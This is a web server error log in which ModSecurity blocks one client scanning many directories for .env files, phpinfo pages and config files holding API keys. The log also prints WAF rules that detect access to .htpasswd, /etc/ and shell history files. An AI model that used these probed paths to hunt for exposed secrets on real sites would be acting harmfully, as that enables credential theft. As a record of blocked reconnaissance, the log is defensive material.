[Tue May 26 15:25:14.451853 2026] [security2:error] [pid 707292:tid 707437] [client 195.178.110.199:32798] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/admin-app/.env"] [unique_id "ahVuAtKAqlRPSIEFAut9uwAAAJQ"]
[Tue May 26 15:25:14.488954 2026] [security2:error] [pid 707292:tid 707547] [client 195.178.110.199:60998] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.sevenstar.onesoft.in"] [uri "/_profiler/phpinfo.php"] [unique_id "ahVuAtKAqlRPSIEFAut9vgAAAQI"]
[Tue May 26 15:25:14.715555 2026] [security2:error] [pid 707292:tid 707464] [client 195.178.110.199:60958] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.sevenstar.onesoft.in"] [uri "/admin_phpinfo.php"] [unique_id "ahVuAtKAqlRPSIEFAut9xgAAAK8"]
[Tue May 26 15:25:14.795756 2026] [security2:error] [pid 707292:tid 707423] [client 195.178.110.199:32778] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/api-node/.env"] [unique_id "ahVuAtKAqlRPSIEFAut9zQAAAIY"]
[Tue May 26 15:25:14.845869 2026] [security2:error] [pid 707292:tid 707426] [client 195.178.110.199:32792] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.sevenstar.onesoft.in"] [uri "/admin/phpinfo.php"] [unique_id "ahVuAtKAqlRPSIEFAut90AAAAIk"]
[Tue May 26 15:25:14.906079 2026] [security2:error] [pid 707292:tid 707476] [client 195.178.110.199:32798] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/api/.env"] [unique_id "ahVuAtKAqlRPSIEFAut90gAAALs"]
[Tue May 26 15:25:14.951530 2026] [security2:error] [pid 707292:tid 707507] [client 195.178.110.199:60978] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/administrator/.env"] [unique_id "ahVuAtKAqlRPSIEFAut91gAAANo"]
[Tue May 26 15:25:15.034410 2026] [security2:error] [pid 707292:tid 707487] [client 195.178.110.199:32814] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/api-backend/.env"] [unique_id "ahVuA9KAqlRPSIEFAut91wAAAMY"]
[Tue May 26 15:25:15.229301 2026] [security2:error] [pid 707292:tid 707539] [client 195.178.110.199:32778] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.sevenstar.onesoft.in"] [uri "/api/info.php"] [unique_id "ahVuA9KAqlRPSIEFAut94wAAAPo"]
[Tue May 26 15:25:15.440153 2026] [security2:error] [pid 707292:tid 707452] [client 195.178.110.199:32808] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.sevenstar.onesoft.in"] [uri "/api/phpinfo.php"] [unique_id "ahVuA9KAqlRPSIEFAut98AAAAKM"]
[Tue May 26 15:25:15.732466 2026] [security2:error] [pid 707292:tid 707436] [client 195.178.110.199:46552] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/apis/.env"] [unique_id "ahVuA9KAqlRPSIEFAut-AQAAAJM"]
[Tue May 26 15:25:16.246695 2026] [security2:error] [pid 707292:tid 707507] [client 195.178.110.199:46650] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/app/.env"] [unique_id "ahVuBNKAqlRPSIEFAut-JAAAANo"]
[Tue May 26 15:25:16.405309 2026] [security2:error] [pid 707292:tid 707482] [client 57.141.2.70:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVuA9KAqlRPSIEFAut-FQAAAME"]
[Tue May 26 15:25:16.422979 2026] [fcgid:warn] [pid 707292:tid 707497] (70014)End of file found: [client 199.45.154.141:53626] mod_fcgid: can't get data from http client
[Tue May 26 15:25:16.731870 2026] [security2:error] [pid 707292:tid 707496] [client 195.178.110.199:46588] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/application/.env"] [unique_id "ahVuBNKAqlRPSIEFAut-OQAAAM8"]
[Tue May 26 15:25:17.083171 2026] [security2:error] [pid 707292:tid 707529] [client 20.29.64.60:3139] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 60.64.29.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "koneksi.com.co"] [uri "/hipwctvg.php"] [unique_id "ahVuBdKAqlRPSIEFAut-UgAAAPA"], referer: www.google.com
[Tue May 26 15:25:18.762522 2026] [security2:error] [pid 707292:tid 707456] [client 195.178.110.199:60978] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/back-api/.env"] [unique_id "ahVuBtKAqlRPSIEFAut-zQAAAKc"]
[Tue May 26 15:25:18.883075 2026] [security2:error] [pid 707292:tid 707470] [client 57.141.2.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVuBtKAqlRPSIEFAut-vgAAALU"]
[Tue May 26 15:25:18.915464 2026] [security2:error] [pid 707292:tid 707508] [client 195.178.110.199:60978] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/back-end/.env"] [unique_id "ahVuBtKAqlRPSIEFAut-0wAAANs"]
[Tue May 26 15:25:18.983686 2026] [security2:error] [pid 707292:tid 707500] [client 195.178.110.199:46548] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/backend-api/.env"] [unique_id "ahVuBtKAqlRPSIEFAut-1AAAANM"]
[Tue May 26 15:25:19.031264 2026] [security2:error] [pid 707292:tid 707530] [client 195.178.110.199:32812] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/backend/.env"] [unique_id "ahVuB9KAqlRPSIEFAut-1QAAAPE"]
[Tue May 26 15:25:19.320678 2026] [security2:error] [pid 707292:tid 707430] [client 195.178.110.199:60972] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/back/.env"] [unique_id "ahVuB9KAqlRPSIEFAut-6AAAAI0"]
[Tue May 26 15:25:19.378286 2026] [security2:error] [pid 707292:tid 707449] [client 195.178.110.199:60978] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/backup/.env"] [unique_id "ahVuB9KAqlRPSIEFAut-6wAAAKA"]
[Tue May 26 15:25:19.696290 2026] [security2:error] [pid 707292:tid 707528] [client 195.178.110.199:46548] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/client/.env"] [unique_id "ahVuB9KAqlRPSIEFAut-_gAAAO8"]
[Tue May 26 15:25:19.709294 2026] [security2:error] [pid 707292:tid 707523] [client 195.178.110.199:46600] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/be/.env"] [unique_id "ahVuB9KAqlRPSIEFAut-_wAAAOo"]
[Tue May 26 15:25:19.712364 2026] [security2:error] [pid 707292:tid 707447] [client 195.178.110.199:46592] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/beta/.env"] [unique_id "ahVuB9KAqlRPSIEFAut_AAAAAJ4"]
[Tue May 26 15:25:19.852268 2026] [security2:error] [pid 707292:tid 707524] [client 195.178.110.199:46548] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/cms/.env"] [unique_id "ahVuB9KAqlRPSIEFAut_CgAAAOs"]
[Tue May 26 15:25:20.081298 2026] [security2:error] [pid 707292:tid 707420] [remote 65.2.90.30:36914] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.90.2.65.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "avprealty.com"] [uri "/wp-login.php"] [unique_id "ahVuB9KAqlRPSIEFAut_DAAAnX8"]
[Tue May 26 15:25:20.205127 2026] [security2:error] [pid 707292:tid 707508] [client 195.178.110.199:46592] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.sevenstar.onesoft.in"] [uri "/config.php"] [unique_id "ahVuCNKAqlRPSIEFAut_IQAAANs"]
[Tue May 26 15:25:20.361908 2026] [security2:error] [pid 707292:tid 707480] [client 195.178.110.199:46552] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.sevenstar.onesoft.in"] [uri "/config/config.php"] [unique_id "ahVuCNKAqlRPSIEFAut_LAAAAL8"]
[Tue May 26 15:25:20.488391 2026] [security2:error] [pid 707292:tid 707541] [client 195.178.110.199:46600] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/config/.env"] [unique_id "ahVuCNKAqlRPSIEFAut_OAAAAPw"]
[Tue May 26 15:25:20.582906 2026] [security2:error] [pid 707292:tid 707478] [client 195.178.110.199:32812] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.sevenstar.onesoft.in"] [uri "/config/module.config.php"] [unique_id "ahVuCNKAqlRPSIEFAut_OgAAAL0"]
[Tue May 26 15:25:20.609510 2026] [security2:error] [pid 707292:tid 707440] [client 195.178.110.199:46650] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.sevenstar.onesoft.in"] [uri "/config/aws.php"] [unique_id "ahVuCNKAqlRPSIEFAut_PAAAAJc"]
[Tue May 26 15:25:20.620650 2026] [security2:error] [pid 707292:tid 707449] [client 195.178.110.199:60956] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.sevenstar.onesoft.in"] [uri "/config/nexmo.php"] [unique_id "ahVuCNKAqlRPSIEFAut_PQAAAKA"]
[Tue May 26 15:25:20.675840 2026] [security2:error] [pid 707292:tid 707522] [client 195.178.110.199:46666] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.sevenstar.onesoft.in"] [uri "/config/config.inc.php"] [unique_id "ahVuCNKAqlRPSIEFAut_QQAAAOk"]
[Tue May 26 15:25:20.759251 2026] [security2:error] [pid 707292:tid 707423] [client 195.178.110.199:46548] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.sevenstar.onesoft.in"] [uri "/config/stripe.php"] [unique_id "ahVuCNKAqlRPSIEFAut_SQAAAIY"]
[Tue May 26 15:25:20.809909 2026] [security2:error] [pid 707292:tid 707490] [client 195.178.110.199:46542] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.sevenstar.onesoft.in"] [uri "/config/env.php"] [unique_id "ahVuCNKAqlRPSIEFAut_UgAAAMk"]
[Tue May 26 15:25:21.227009 2026] [security2:error] [pid 707292:tid 707496] [client 57.141.2.4:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVuCNKAqlRPSIEFAut_UQAAAM8"]
[Tue May 26 15:25:21.393844 2026] [security2:error] [pid 707292:tid 707500] [client 195.178.110.199:46680] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/crm/.env"] [unique_id "ahVuCdKAqlRPSIEFAut_fQAAANM"]
[Tue May 26 15:25:21.404989 2026] [security2:error] [pid 707292:tid 707475] [client 195.178.110.199:46566] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/cron/.env"] [unique_id "ahVuCdKAqlRPSIEFAut_fgAAALo"]
[Tue May 26 15:25:21.411052 2026] [security2:error] [pid 707292:tid 707435] [client 195.178.110.199:60930] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/current/.env"] [unique_id "ahVuCdKAqlRPSIEFAut_fwAAAJI"]
[Tue May 26 15:25:21.544310 2026] [security2:error] [pid 707292:tid 707499] [client 195.178.110.199:46620] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/develop/.env"] [unique_id "ahVuCdKAqlRPSIEFAut_hwAAANI"]
[Tue May 26 15:25:21.552578 2026] [security2:error] [pid 707292:tid 707423] [client 195.178.110.199:32814] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/developer/.env"] [unique_id "ahVuCdKAqlRPSIEFAut_iwAAAIY"]
[Tue May 26 15:25:21.654808 2026] [security2:error] [pid 707292:tid 707537] [client 195.178.110.199:46600] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/demo/.env"] [unique_id "ahVuCdKAqlRPSIEFAut_kwAAAPg"]
[Tue May 26 15:25:21.700315 2026] [security2:error] [pid 707292:tid 707485] [client 114.119.155.83:23015] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "glorodavionics.com"] [uri "/glorod_new/index.php"] [unique_id "ahVuCdKAqlRPSIEFAut_mAAAAMQ"], referer: http://glorodavionics.com/glorod_new/index.php?route=product/product&product_id=53
